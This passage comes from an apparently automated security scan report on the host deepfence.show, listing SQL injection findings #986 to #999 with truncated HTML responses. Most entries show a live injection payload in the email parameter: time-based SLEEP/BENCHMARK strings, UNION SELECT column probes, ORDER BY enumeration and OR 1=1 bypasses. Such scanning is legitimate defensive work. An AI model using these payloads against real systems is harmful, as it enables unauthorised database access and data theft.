of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #986\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor SLEEP(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #987\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #988\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #989\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or '1'='1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #990Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ' or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #991\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #992\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'\n)),4,5,6,7,8,9,10,11--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #993\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #994\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io+ SLEEP(10) + '\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #995\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #996\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #997\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8-\n-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #998\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #999\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script 